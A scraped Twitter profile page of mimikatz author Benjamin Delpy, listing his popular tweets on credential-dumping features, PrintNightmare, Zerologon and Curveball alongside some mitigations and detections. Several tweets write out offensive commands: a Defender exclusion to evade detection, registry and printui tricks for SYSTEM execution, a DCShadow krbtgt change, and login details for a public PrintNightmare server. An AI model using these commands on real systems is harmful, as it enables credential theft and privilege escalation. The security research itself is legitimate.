🥝🏳️‍🌈 Benjamin Delpy @gentilkiwi Twitter profile

Last Seen Profiles

@savannahguilty

@SwooshLieu

@oogakesanmelon

@dronechiba

@LucianaACBarros

@logijca

@FWendelstig

@ChadsOnNear

@glicocola

@hostbrno

@snpraises

@rosiponc

@RenattaOxendine

@GrandChaseG

@MCUPerfectGifs

@loggedonDon

@_emschmidt_

@LaureCroiset

@AkMindset

@rodriguezxmess

@zpoffical12

@cwpathwayw

@jakzilla

@dmkyuhyun

@Esports_SiB

@andrewbenge

@faggotloverboy

@ddk1014

@GEcologie

@Vida_Y_Libert4d

@SageWats

@HilleardMark

@doot_iia

@rasmushorn

@toon_snw17

@paulascachette

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

6 years

This @Apple new security measure is damn good... #mimikatz

13

787

2K

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

3 years

So #mimikatz wanted passwords, and Terminal Server has some for us🥝 Cleartext passwords *decrypted* on a fully, up to date Windows 2019 Server No library, no previous code injection, and doesn't use junk part of memory😉 Ping @jonasLyk , still in testing ... 🤪

25

572

2K

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

6 years

Just released a new #mimikatz version to support Windows 10 1803 to bypass the Credential Guard authentication chain Reminder: your passwords/keys are not in the secure world... only its storage **after** authentication! @reni_ni this version is for you 😉

14

891

1K

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

6 years

Do you want to RDP on workstations / servers without limitations on the number of users? (aka: another admin is already logued on this server) Patch Terminal Server service with #mimikatz , now ready for Windows 10 1803 🙃

23

725

1K

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

3 years

Now in #mimikatz 🥝, #mstsc credentials (passwords / PIN codes) for RDP / Remote Desktop Client - ts::mstsc - on client credentials - ts::logonpasswords - on server credentials Does not rely on previously injected hook/library, useful on jumping servers >

22

472

1K

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

3 years

Little #printnightmare (ep 4.3) upgrade : user-to-system as a service🥝 > Open SYSTEM prompt connect to \\printnightmare[.]gentilkiwi[.]com (remove [ ]) with - user: .\gentilguest - password: password Open 'Kiwi Legit Printer - x64', enjoy SYSTEM (just one printer this time🤪)

21

426

1K

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

6 years

Because sometimes you want to bypass the RDP Client Drive redirection policy... ...only with the mouse 🙃 (of course, to copy #mimikatz , what else)

18

632

1K

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

2 years

Want a quick & dirty (but supported by Microsot) way to avoid #follina Office know payloads? Just disable "Troubleshooting wizards" by GPO > HKLM\SOFTWARE\Policies\Microsoft\Windows\ScriptedDiagnostics - EnableDiagnostics - 0 By CERT @banquedefrance

26

463

1K

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

3 years

This #printnightmare / CVE-2021-1675 is really serious 🤪 Just adapted/simplified original POC then: *From Remote standard user to SYSTEM* Here on a domain controller, but valid on all systems with RPC to spooler available, remote or local ➡️ disable service now (no patch yet)

14

551

1K

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

4 years

A new #mimikatz 🥝release with #zerologon / CVE-2020-1472 detection, exploit, DCSync support and a lots of love inside ❤️ It now uses direct RPC call (fast and supports unauthenticated on Windows) > Thank you: @SecuraBV

12

606

1K

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

5 years

I updated #mimikatz to support Windows 1809, even the kernel driver! (with my expired certificate😬) Of course, misc::memssp to bypass Credential Guard chain included😚 (but also, crypto, event log, terminal server...and passwords in clear when enabled!) >

12

527

1K

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

6 years

Gentle reminder: when you delete certificates on Windows, it does not delete associated private keys on the disk... Take a look in: %appdata%\Microsoft\Crypto\RSA (of all users 😉) A gift for forensinc/data recovery, but also for #mimikatz and attackers...

16

578

954

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

3 years

Bad month Microsoft, hmm?

Jonas L

@jonasLyk

3 years

yarh- for some reason on win11 the SAM file now is READ for users. So if you have shadowvolumes enabled you can read the sam file like this: I dont know the full extent of the issue yet, but its too many to not be a problem I think.

35

418

1K

14

355

953

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

3 years

Windows 365 is expensive and without basic security Did #mimikatz dumped my Azure *cleartext* password here? Or my Primary Refresh Token? It's funny how you don't apply best practices you recommend to the customer to avoid securing by default >

22

341

951

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

4 years

Using a Local Account, and have Windows Hello PIN code configured? ('cause Microsoft says it's more secure 🤷‍♂️) Cleartext password is in the SYSTEM vault TPM or not #mimikatz loves your passwords 🥰 Thank you @tijldeneut for questions on it (I was too much on PRT 🤔)

22

410

906

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

3 years

Thanks to @cube0x0 works (& the damned RpcBindingSetObject function on Windows🤬), a new #mimikatz 🥝release using MS-PAR protocol instead of MS-RPRN Now, #printnightmare / CVE-2021-34527 *everywhere*, not only domain controller: servers & workstations >

17

428

876

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

2 years

Always fabulous to see editors low the Windows Security level When Citrix SSO is enabled... passwords are stored in *user processes* (in addition to system ones) Ho yeah, *even if you have Credential Guard* Yeah, that's what Citrix is calling "SSO" > Will be in #mimikatz 3 🥝

17

312

855

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

6 years

#mimikatz kitten edition ! 😘 Now supports saved password in RDG files (used with Remote Desktop Connection Manager) 🤷‍♂️ Friends don't let friends save passwords with DPAPI You know it's ~like cleartext passwords? Especially with domain backup key? >

8

508

826

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

3 years

By the way, #mimikatz bypassing Windows Defender detection (like a lots of other security products) is still simple as being a little bit patient... 1. yep, they catch it without this delay... 2. yep, real time protection & cloud (without submission) are enabled

17

260

825

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

3 years

#printnightmare - Episode 3 You know that even patched, with default config (or security enforced with #Microsoft settings), a standard user can load drivers as SYSTEM? - Local Privilege Escalation - #feature

22

398

831

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

4 years

So much fun this morning, a @Microsoft signed #mimikatz Thank you @jxy__s for your research and a such beautiful code Now, will wait for people to understand that the "source file" can be really another thing than a file on the disk

7

287

815

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

7 years

Because #mimikatz is not only a EXE, mimikatz.dll will be here #soon 😉 #rundll32 💖!

16

523

791

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

7 years

This is really ridiculous, @CarbonBlack_Inc So basic... no external tools required...

23

473

777

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

5 years

That's getting ridiculous 😅 calc.exe (or any other program) detected as #mimikatz because of "sekurlsa" arguments 🤷‍♂️ All that NextGen / IA / Cloud / Behavior detection is too much for me 😉

20

304

772

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

3 years

Q: what can you do when you have #mimikatz 🥝 & some Read access on Windows system files like SYSTEM, SAM and SECURITY? A: Local Privilege Escalation 🥳 Thank you @jonasLyk for this Read access on default Windows😘

19

302

772

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

6 years

Do you know how to get cleartext passwords of users, at logon, in a Windows 10? Especially with Credential Guard enabled? #mimikatz - It's easy as an Authentication Package (mimilib) or a piece of code injected...

4

499

759

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

4 years

That epic Microsoft moment❤️ #cve20200601 #curveball Recently worked on #mimikatz and ECC, so yes, 10 and 2016/2019 only. Previous versions like Windows 7 did not support personnal EC curves (only few NIST standard ones)

6

323

736

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

5 years

Hey @_dirkjan , I just tested your #PrivExchange attack on a 2019 DC with 2019 Exchange (without separated administration at install) It works like a charm, so much class with this attack🤘 I'm so loving it. Thank you for your work 😘 and @agsolino for #impacket too 🥰

10

289

716

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

3 years

I was told you like SCCM passwords & #mimikatz 🥝 Did you know SCCM *endpoints* can keep credentials of all your Network Access Accounts? Time to try the new dpapi::sccm command and to check privileges associated to them 😉 >

9

306

717

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

5 years

Love to read @Microsoft comments in code >

8

179

701

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

6 years

What if you can avoid all events ? Even the one saying you cleared all events ? 🙃 #mimikatz #notrace

12

413

660

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

7 years

#mimikatz stops @CarbonBlack_Inc (even without a driver, I'm fair play😉) Was surprised to be able to dump credentials in the default conf...

7

460

656

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

6 years

I'm sure you want to test #mimikatz 🥝DCShadow by yourself: ( @mysmartlogon rocked the code 🤘) Eg: lsadump::dcshadow /object:CN=krbtgt,CN=Users,DC=lab,DC=local /attribute:ntPwdHistory /value:00112233445566778899aabbccddeeff000102030405060708090a0b0c0d0e0f

7

366

659

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

3 years

It's time to play with #mimikatz 🥝& #kekeo 🐤& #impacket If you have a Windows PKI with its WebServer, you'll have problems🤪 No authentication/credential to *full domain owned* > > 👍 @topotam77 EFS & PetitPotam 👍 @ExAndroidDev PR

17

310

663

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

6 years

Want to get a usable Kerberos TGT without admin rights/allowtgtsessionkey? It's easy with a delegation ticket! (enabled by default...) No special requirement, just some love😘 > Thank you @elad_shamir (and @TheColonial 🙃) for evil ideas!

3

332

661

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

6 years

Dump *domain* (& generic 🙃) Windows credentials from the Credential Manager without admin! #mimikatz *needs domain user rights (or user password, of course!) Something makes me think that a little howto would interest you ...

6

396

632

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

3 years

Guess who got SYSTEM this morning...?

19

41

610

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

4 years

#mimikatz is now able to decrypt Credential Guard blobs when you have access to Secure Worlds keys (here a vmem file of VMWare) > Thanks to @FSecureLabs & @TimoHirvonen for dumps & work -- more to come with their (mini)dumping ideas with #physmem2profit 😉

5

289

602

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

6 years

Did you know #mimikatz can patch RDP server to allow multiple simultaneous sessions, workstations or servers? 🙃 (because some people do not like the command line 😉)

5

328

585

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

6 years

New Windows Domain Controller compromission: with #mimikatz : set *PREVIOUS* krbtgt keys (here the RC4 one) - and welcome golden tickets ! ** Who's auditing setting the previous key ?🤪 ** Thank you to @mysmartlogon and the god of crypto bugs ! ( #soon on the release section)

7

383

582

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

5 years

- have NTLM hash of a DC ? - need computer/server/dc NTLM/RC4 key ? - ...but affraid to make silver ticket and/or DCSync (detection) ? Use NT 3.5 protocol against a 2019 DC, because, yes: LEGACY 🤷‍♂️ (so old, but so good: )

8

258

575

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

3 years

Want to block [MS-EFSR] / #PetitPotam calls?🤔 Use RPC filters ! 🥳 put previous Tweet in a file: `block_efsr.txt` then: > netsh -f block_efsr.txt Just tested: it blocks remote connections & not local EFS usage Thank you to @CraigKirby to remind us this RPC technology filter!

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

3 years

rpc filter add rule layer=um actiontype=block add condition field=if_uuid matchtype=equal data=c681d488-d850-11d0-8c52-00c04fd90f7e add filter add rule layer=um actiontype=block add condition field=if_uuid matchtype=equal data=df1941c5-fe89-4e79-bf10-463657acf44d add filter quit

1

70

251

13

299

577

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

3 years

I rewrited #mimikatz 🥝code for #printnightmare - less calls (can be in only 1 call, LPE or RCE) ; - more efficient ; - mimispool library can be modified to be a real driver ; - support Windows 7 to Windows 11 (TPM or not🤪) >

6

216

561

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

3 years

#windows11 & #mimikatz driver 🤣

10

120

562

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

3 years

After few tweakings, #printnightmare - Episode 4.1 Now works from any computers, even not domain joined User to SYSTEM But I don't understand... Windows 11 with VBS security & TPM 2.0 don't protect me ?🤔

16

220

559

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

3 years

Want to test #printnightmare (ep 4.x) user-to-system as a service?🥝 (POC only, will write a log file to system32) connect to \\ with - user: .\gentilguest - password: password Open 'Kiwi Legit Printer - x64', then 'Kiwi Legit Printer - x64 (another one)'

13

208

548

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

3 years

Updated #printnightmare flow chart Yes, LPE is possible under certain circumstances even if disable the Print Spooler service inbound remote printing #mimikatz update on its way

10

214

548

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

4 years

This new Microsoft Terminal is very #mimikatz friendly ❤️🥝

8

118

537

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

5 years

I just pushed a new #mimikatz release to support Windows 10 1903 (build 18362) Even the driver (not really well signed - but loadable 😉) is in the package. Ho, yes, misc::memssp still work to hook and get passwords 🤷‍♂️ >

3

251

522

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

5 years

Because I had question about "Protected Process" and LSA (RunAsPPL), don't forget that #mimikatz driver (mimidriver) can remove the Flags without any reboot or UEFI program😘 And yes, this is also for Windows 10 1903 x64 & x86 😉 >

4

206

503

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

3 years

#mimikatz 2 + #kekeo 2 = #mimikatz 3🥝 * ASN.1 encode+decode (no more #kekeo impossible build) * Submodules (no more gigantisc misc::) * VS 2019 Community (no more VS2010/2012 tricks) * International input/output * & more... ! Still support Windows XP🤪 ...coding in progress😉

10

132

512

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

3 years

Customers waiting for official Microsoft communication about #printnightmare 4.x (user to SYSTEM) "We are investigating and will take appropriate action as needed to help keep customers protected."

7

123

501

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

3 years

Save a tree, kill a Print Spooler service - #printnightmare

4

155

506

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

4 years

Decrypting credentials with #mimikaz & DPAPI is fun. But recreating masterkeys on your own machine to deal with all credentials is cool too. Especially when you can steal browser sessions and bypass 2FA with user's cookies😉 >

3

210

502

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

3 years

Want to try to decode SCCM passwords in SC_UserAccount table with #mimikatz ? 🥝 (hints, lots of them have usually admin rights 🤪) A little POC here: So @bugch3ck can try it ;)

6

229

490

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

4 years

#trollday : epic Windows Defender bypass... before running #mimikatz : $mimikatz = 'C:\Users\Gentil Kiwi\Desktop\mimikatz.exe' ; Add-MpPreference -ExclusionPath $mimikatz -AttackSurfaceReductionOnlyExclusions $mimikatz

9

184

486

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

7 years

After reversing some #Petya parts, I can certify some files are a recompiled minimalist/limited version of #mimikatz

11

495

469

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

4 years

I just pushed the first #mimikatz version of the year Support RSA, DSA & EC(DH|DSA) keys: - export (even when not exportable) - convert from different format (PVK,blob,PKCS #8 ,PEM,DER,...) to PKCS #8 - build your PKCS #12 (pfx) from raw keys & certificates >

7

221

483

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

4 years

I just pushed a new #mimikatz update, with more DPAPI & Crypto stuff inside > 'cause you know, who don't love moaaaar credentials?

5

223

486

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

3 years

New #mimikatz release to test new ts::logonpasswords feature (experimental)🥝 - Only with active users - Only tested on 2012R2/2016/2019 + some Windows 10 LTSC > * Do not hesitate to make some tests @awakecoding @jonasLyk @FuzzySec @n00py1 etc. 🤪

8

178

482

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

6 years

Because it's "easy" to monitor the clipboard content from #mimikatz to get sensitive data 🙃 (or garbage text) (not related to Keepass, but you can understand more easily the idea)

8

238

470

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

6 years

Wait @Microsoft , are you sure about your new Q/A mechanism in Windows 1803 ? (at least, password is not stored in cleartext in the vault like in previous versions 😉) Test with #mimikatz by yourself: Thanks a lot @mihi42 ( )

7

280

462

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

3 years

Thanks to @_f0rgetting_ we have an explanation about why we have an Elevated Token (allowing #PrintNightmare on patched domain controllers): legacy If you remove "Authenticated users" from "Builtin\Pre-Windows 2000 Compatible Access", the original Microsoft Patch works again🤩

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

3 years

#PrintNightmare DC (left) vs non-DC (right) so it seems linked to Token (Filtering / ?), and default DC behavior.

7

35

102

10

233

462

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

6 years

Just uploaded a new #mimikatz update featuring mimidrv for Windows 10 version 1709, x64 included.

1

315

455

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

3 years

Dealing with strings & filenames is hard😉 New function in #mimikatz 🥝to normalize filenames (bypassing checks by using UNC instead of \\server\share format) So a RCE (and LPE) with #printnightmare on a fully patched server, with Point & Print enabled >

16

176

450

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

4 years

I just pushed a new #mimikatz version supporting Windows 10 2004 (build 19041) 🥝 > With sekurlsa, rdp, event, crypto... and #mimidrv 🥰

4

150

448

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

4 years

That moment when you love C #Zerologon

5

151

451

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

6 years

A little update for #mimikatz to support Windows 10 1803 (x64 at this time 😘) >

5

235

438

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

3 years

Would you like to try to dump your #Windows365 Azure passwords in the Web Interface too? A new #mimikatz 🥝release is here to test! (Remote Desktop client still work, of course!) > cc: @awakecoding @RyMangan

11

154

429

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

4 years

Ho, by the way, #curveball #cve20200601 is not only about TLS & Authenticode... it's also for S/MIME and other signatures. Yes, it's also valid against #Outlook mail signature verification ❤️ I hope nobody rely on it for legal / workflow validation

7

243

427

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

2 years

Don't you think #mimikatz 3 is more sexy with #kekeo inside? Still compatible with Windows XP, Without custom compiler this time (VS2019+ Community+) Without commercial ASN1 library

10

136

427

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

3 years

#printnightmare patch tuesday looks like promising

13

97

422

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

6 years

Next #mimikatz release with (real) digital signature of binaries Yep, x64 kernel driver too #soon

4

197

422

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

5 years

I can't imagine the price of the Oracle Database licence

20

73

413

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

3 years

In enterprise environment (domain/user single sign on) you can make some dirty tricks with #printnightmare ... reg add "HKCU\Printers\Connections\,,print.lab.local,Kiwi Legit Printer" /f /v Provider /t REG_SZ /d win32spl.dll Next user logon or spooler refresh, SYSTEM execution

9

155

413

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

2 years

#mimikatz 3 development

13

19

411

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

6 years

A quick & dirty #Splunk search to detect basic #mimikatz DCSync with DC security events: (specify your index!) Seems to detect normal account, golden & silver ticket usage to DCSync. One exception: (with the original meme inside 🙃)

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

9 years

#mimikatz DCSync make logs with 'Directory Service Access' DS-Replication-Get-Changes* Except if you use a DC account http://t.co/QAChOGU3z7

2

22

34

6

207

412

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

3 years

But my favorite (for now) #printnightmare dirty trick is: *as a standard user* the way to *force* all other users/admins of workstation/server to install printers😂 rundll32 printui,PrintUIEntry /ga /n"\\print.lab.local\Kiwi Legit Printer" Rpc(Asyn)cAddPerMachineConnection

8

172

411

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

6 years

CredSSP with "Default Credentials Delegation" keeps passwords in client memory, but you must *also* secure the target🙃 Impersonation/Admin/System/Tickets (Golden or not...) lets a standard user (or...) to get its password🤪 Not in #mimikatz , try #kekeo -

7

218

405

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

6 years

If you get the smartcard of an user, #mimikatz can extract its NTLM hash if its authentication is cached... even offline/without DC interaction🙃... cc: @agsolino

6

239

407

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

7 years

Because one #mimikatz is never enough, 3-in-1 are ready to test in this release (normal / powershell / dll) 🙃 >

6

308

400

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

4 years

Windows Defender killing Outlook process because of the usage of an authentication certificate with CN=.., O=mimikatz, ... ✅ "Internal behavior"

8

98

400

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

7 years

And @cylanceinc makes your coffee darker in the morning too. But please, be polite! @bbaskin , @CasualSec , @CarbonBlack_Inc

20

225

401

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

5 years

I did almost forget that #mimikatz can run without using the infamous debug privilege... the default with XP/2003, but also if you're SYSTEM on newer platforms (like in some Meterpreter sessions 😉) Stop thinking removing debug privilege to administrators will stop #mimikatz 😘

2

186

401

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

7 years

You don't like your IT password complexity/length rules? Neither me. #mimikatz will change your password for you😉 -

7

309

394

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

3 years

New #mimikatz 🥝update is coming Will be ready up to Server 2022 (and ~ready for Windows 11)

5

99

400

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

3 years

Very (very) soon in #mimikatz 🥝 Client RDP passwords/PIN in MSTSC process, decrypted. Without previous injection/hook in process, of course😉 Especially useful on jump servers🤪 ~ Can also be used to debug some internal properties ~

7

134

398

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

4 years

#cve20200601 #curveball last use case for today Yes, it's also dangerous for Microsoft VBA macro (especially when you think "Disable all Macros except digitally signed" will protect you)

6

190

385

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

6 years

Some #mimikatz issues are better than others...

15

137

386

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

3 years

#printnightmare - Episode 4 You know what is better than a Legit Kiwi Printer ? 🥝Another Legit Kiwi Printer...👍 No prerequiste at all, you even don't need to sign drivers/package🤪

11

148

385

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

4 years

#mimikatz update to support new @googlechrome encryption for Credentials & Cookies (AES-256-GCM with a global AES key protected by DPAPI) (still support the legacy DPAPI too 😉) Thank you @kevinmitnick & @riflon for the report😘 > Moaaaar credentials 🤪

4

178

380

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

5 years

Thanks to Rory McNamara 🥰 ( ) _and a big SQLITE3 lib update_, #mimikatz can now open Chrome saved passwords & cookies databases already opened by Chrome (without making a copy of them somewhere..) Be efficient and use it as is! >

3

186

369

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

4 years

Official tool 'dpapimig' (and RPC) needs user's SID & password... in some 'test' situations you don't have that password, but maybe: NTLM hash, SHA1 hash, DPAPI hash, Kerberos ticket, krbtgt, DC$, domain Backup keys... So many option with #mimikatz >

2

141

374

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

5 years

I just pushed a #mimikatz update to deal with #PowerShell PSCredential & SecureString saved in XML files 😬 You can deal with them in the same ways as other DPAPI blob, local system, rcp, password, hash, domain backup key... More credentials love 🥰 >

5

179

375

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

7 years

'From Mimikatz to Kekeo, Passing by New Microsoft Security Technologies' Slides from my talk @ #bluehatil

9

315

367

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

3 years

August PatchTuesday #printnightmare

6

69

365

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

3 years

#printnightmare 4.x - lots of❤️to the printnightmare[.]gentilkiwi[.]com Internet server, but some wanted to have a Lan server. Legit: many companies don't allow outbound SMB traffic (as some ISP) > Some PowerShell commands to help: (& new mimispool.dll)

10

157

359

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

7 years

POC to decrypt WanaCry files: *only* if you have the USER RSA private key (😩) Tx: @msuiche @halsten @malwareunicorn

8

317

354

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

6 years

I'm not a hash/password cracker, but some of you are. For the love of @tifkin_ , @harmj0y and @hashcat , #mimikatz can now patch LSASS to force NTLM Server challenge to 0x1122334455667788 (still experimental: W7-SP1 and W10-1709 only at this time)

4

229

355

🥝🏳️‍🌈 Benjamin Delpy

@gentilkiwi

4 years

It will be my new wallpapers #cve20200601 #curveball

4

92

352